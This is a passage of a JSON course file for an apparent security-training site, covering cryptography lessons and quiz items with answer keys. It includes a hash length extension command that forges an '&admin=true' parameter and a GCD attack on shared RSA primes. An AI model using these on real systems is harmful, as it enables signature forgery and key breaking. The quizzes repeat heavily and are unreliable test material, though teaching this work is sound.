Understanding failures teaches more than success."},{"type":"quiz","q":"XOR property useful for crypto?","opts":["One-way","Reversible: A ^ B ^ B = A","Slow","Compresses"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"aes-modes","cat":"Cryptography","title":"AES Encryption Modes","diff":2,"xp":150,"intro":"ECB reveals patterns. CBC vulnerable to padding oracle. GCM is authenticated.","sections":[{"type":"text","content":"ECB: identical blocks = identical ciphertext. CBC: padding oracle. GCM: authenticated encryption."},{"type":"code","lang":"python","content":"from Crypto.Cipher import AES\ncipher = AES.new(key, AES.MODE_GCM)  # Use this\nciphertext, tag = cipher.encrypt_and_digest(plaintext)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Why is ECB insecure?","opts":["Slow","Identical plaintext blocks = identical ciphertext","No key","Unencrypted"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"rsa-math","cat":"Cryptography","title":"RSA Mathematics","diff":2,"xp":200,"intro":"Two primes, modular exponentiation, factoring difficulty.","sections":[{"type":"text","content":"RSA: n=p*q, phi=(p-1)(q-1), e coprime to phi, d=e^-1 mod phi. c=m^e mod n."},{"type":"code","lang":"python","content":"p, q = 61, 53\nn = p * q  # 3233\nphi = (p-1)*(q-1)\ne = 17\nd = pow(e, -1, phi)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RSA security relies on?","opts":["Discrete log","Integer factorization","Hash collision","Traveling salesman"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"rsa-attacks","cat":"Cryptography","title":"RSA Attacks","diff":3,"xp":250,"intro":"Small e, shared primes, Hastad's broadcast.","sections":[{"type":"text","content":"Common factor attack: if two keys share a prime, GCD reveals it."},{"type":"code","lang":"python","content":"import math\ncommon_p = math.gcd(n1, n2)  # breaks both keys"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Attack when two RSA keys share a prime?","opts":["Brute force","GCD attack","Padding oracle","Birthday"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"diffie-hellman","cat":"Cryptography","title":"Diffie-Hellman Key Exchange","diff":2,"xp":150,"intro":"Agree on a shared secret over an insecure channel.","sections":[{"type":"text","content":"Alice sends g^a mod p, Bob sends g^b mod p. Both compute g^(ab) mod p."},{"type":"code","lang":"python","content":"p, g = 23, 5\na, b = 6, 15\nA = pow(g, a, p)\nB = pow(g, b, p)\nassert pow(B, a, p) == pow(A, b, p)  # shared secret"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DH security relies on?","opts":["Factoring","Discrete logarithm","Hashing","Symmetric encryption"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"elliptic-curve-basics","cat":"Cryptography","title":"Elliptic Curve Crypto","diff":3,"xp":200,"intro":"Same security as RSA with much smaller keys.","sections":[{"type":"text","content":"ECC: 256-bit key = 3072-bit RSA security. Used in TLS, Bitcoin, SSH."},{"type":"code","lang":"python","content":"from cryptography.hazmat.primitives.asymmetric import ec\nkey = ec.generate_private_key(ec.SECP256R1())"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"ECC advantage over RSA?","opts":["Older","Same security, smaller keys","Uses symmetric","No private key needed"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"hash-functions","cat":"Cryptography","title":"Hash Functions","diff":1,"xp":75,"intro":"One-way functions producing fixed-size output.","sections":[{"type":"text","content":"MD5 (broken), SHA-1 (broken), SHA-256 (secure). Used for passwords, integrity, signatures."},{"type":"code","lang":"bash","content":"echo -n 'password' | sha256sum"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Which hash is broken?","opts":["SHA-256","SHA-512","MD5","SHA-3"],"ans":2},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"hash-length-extension","cat":"Cryptography","title":"Hash Length Extension","diff":3,"xp":250,"intro":"Append data to a hash without knowing the message.","sections":[{"type":"text","content":"Exploits Merkle-Damgard (MD5, SHA-256). Compute H(secret||msg||pad||appended) without the secret."},{"type":"code","lang":"bash","content":"hash_extender --data 'user=guest' --secret-length 16 --append '&admin=true' --signature <hash>"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"What prevents length extension?","opts":["MD5","HMAC","Longer secrets","Base64"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected 